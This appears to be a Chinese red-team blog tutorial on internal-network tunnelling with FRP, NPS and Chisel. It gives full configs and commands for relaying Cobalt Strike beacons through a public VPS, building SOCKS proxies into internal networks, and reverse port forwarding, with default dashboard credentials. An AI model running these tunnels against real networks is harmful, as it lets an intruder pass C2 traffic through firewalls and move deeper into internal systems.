内网对抗-隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线

Ethan医生6天前信息收集20

 内网穿透-C2上线-Frp&NPS&Chisel

 内网穿透-Socks建立-Frp&NPS&Chisel

 内网穿透-端口映射转发-Frp&NPS&Chisel


Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。

项目下载:https://github.com/fatedier/frp

 

FRP 的核心概念

  1. FRP 服务端 (frps)

    • 部署在具有公网 IP 的服务器上,用于接收外部请求并转发到内网客户端。

    • 配置文件通常为 frps.ini

  2. FRP 客户端 (frpc)

    • 运行在内网机器上,负责将本地服务暴露到服务端。

    • 配置文件通常为 frpc.ini




#内网穿透C2上线

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

修改配置文件frps.ini:

[common]

bind_port = 7000

启动服务端:

./frps -c ./frps.ini

 

2.客户端-下载-解压-修改-启动

修改配置文件frpc.ini:

[common]

serverAddr = "47.98.210.85"

serverPort = 7000

 

[[proxies]]

name = "test-tcp"

type = "tcp"

localIP = "127.0.0.1"

localPort = 5555

remotePort = 6666

启动客户端:

 ./frpc -c ./frpc.ini

 

3、CS配置监听器

监听器1:VPS-IP:6666

监听器2:CS-IP:5555

后门生成:监听器1

 

#内网穿透信息收集

1、建立Socks节点(入站没限制采用)

启动服务端:frps -c frpssock.ini

[common]

bind_port = 7000

bind_addr = 0.0.0.0

 

dashboard_port = 7500

dashboard_user = admin

dashboard_pwd = admin@123

log_frp = /var/log/frps.log

log_level = info

log_max_days = 3

authentication_timeout = 0

max_pool_count = 50

allow_ports = 80-50000

启动客户端:frpc -c frpcsock.ini

[common]

server_addr = 47.98.210.85

server_port = 7000

tls_enable = ture

pool_count = 5

 

[plugin_socks]

type = tcp

remote_port = 6000

plugin = socks5

plugin_user = admin

plugin_passwd = admin@123

use_encryption = true

use_compression = true

 

2、主动转发数据(出站没限制采用)

服务端启动:frps -c frps.ini

[common]

bind_port = 7000

 

客户端启动:frpc -c frpc.ini

[common]

serverAddr = "47.98.210.85"

serverPort = 7000

 

[[proxies]]

name = "test-tcp"

type = "tcp"

localIP = "192.168.2.22"

localPort = 80

remotePort = 8888


Nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。

项目下载:https://github.com/ehang-io/nps

 

#内网穿透C2上线

1、启动

./nps install

./nps

http://VPS-IP:8080/ admin/123

2、创建客户端,生成密匙

./npc -server=VPS-IP:8024 -vkey=xxxxxx

3、添加协议隧道,绑定指向

远程绑定6666,指向本地5555

4、CS配置监听器

监听器1:VPS-IP:6666

监听器2:CS-IP:5555

后门生成:监听器1

 

#内网穿透信息收集

1、建立Socks/HTTP隧道(入站没限制采用)

添加协议隧道,绑定端口

配合Proxifier规则配置测试

 

2、主动转发数据(出站没限制采用)

添加协议隧道,绑定目标及端口



Chisel 是一个快速 TCP/UDP 隧道,通过 HTTP 传输,通过 SSH 保护。单个可执行文件包括客户端和服务器。用 Go(golang)编写。 Chisel 主要用于穿过防火墙,但也可用于为网络提供安全端点。

项目下载:https://github.com/jpillora/chisel

 

#内网穿透C2上线

建立服务端监听1234

./chisel server -p 1234 --reverse

建立客户端连接服务端后将141上5555给到服务端6666上

./chisel client -v 47.98.210.85:1234 R:0.0.0.0:6666:192.168.139.141:5555

 

#内网穿透信息收集

1、建立Socks节点(入站没限制采用)

建立服务端监听1090

chisel server -p 1090 --socks5

建立客户端连接服务端后将使用Socks服务

chisel client 远程IP地址:1090 socks &

 

2、主动转发数据(出站没限制采用)

建立服务端监听1234

./chisel server -p 1234 --reverse

建立客户端连接服务端后将141上5555给到服务端6666上

./chisel client -v 47.98.210.85:1234 R:0.0.0.0:8888:192.168.2.22:80


标签: 内网对抗

相关文章

内网对抗-隧道技术篇&防火墙组策略&HTTP反向&SSH转发&出网穿透&CrossC2&解决方案

内网对抗-隧道技术篇&防火墙组策略&HTTP反向&SSH转发&出网穿透&CrossC2&解决方案

➢ C2上线-多平台系统-CrossC2项目➢ 隧道技术-SSH转发-出站限制&信息收集➢ 隧道技术-HTTP反向-出站限制&信息收集&上线#HT...

内网对抗-信息收集篇&自动项目&本机导出&外部打点&域内通讯&Pillager&BloodHound

➢ 信息收集-工具项目-本机-Searchall&Pillager➢ 信息收集-工具项目-打点-FScan&Template➢ 信息收集-工具项目-综合-...

内网对抗-网络通讯篇&防火墙组策略&入站和出站规则&单层双层&C2正反向上线&解决方案

➢ 防火墙策略-入站规则&出站规则&自定义➢ 单层防火墙-命令关闭&更改策略-C2上线➢ 单层防火墙-正向监听&反向中转-C2上线➢&nb...

内网对抗-隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案

内网对抗-隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案

➢ 隧道技术-ICMP-探针&搭建-C2上线&穿透➢ 隧道技术-DNS-探针&搭建-C2上线&穿透学隧道前先搞清楚0、不是有互联网才叫出网(出网的意...

内网对抗-基石框架篇&单域架构&域内应用控制&成员组成&用户策略&信息收集&环境搭建

➢ 内网单域架构-环境搭建-服务安装&加入域内➢ 内网单域架构-信息收集-手工命令&工具插件#工作组:将不同的计算机按照功能分别列入不同的工作组。想要访问某个部门的...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。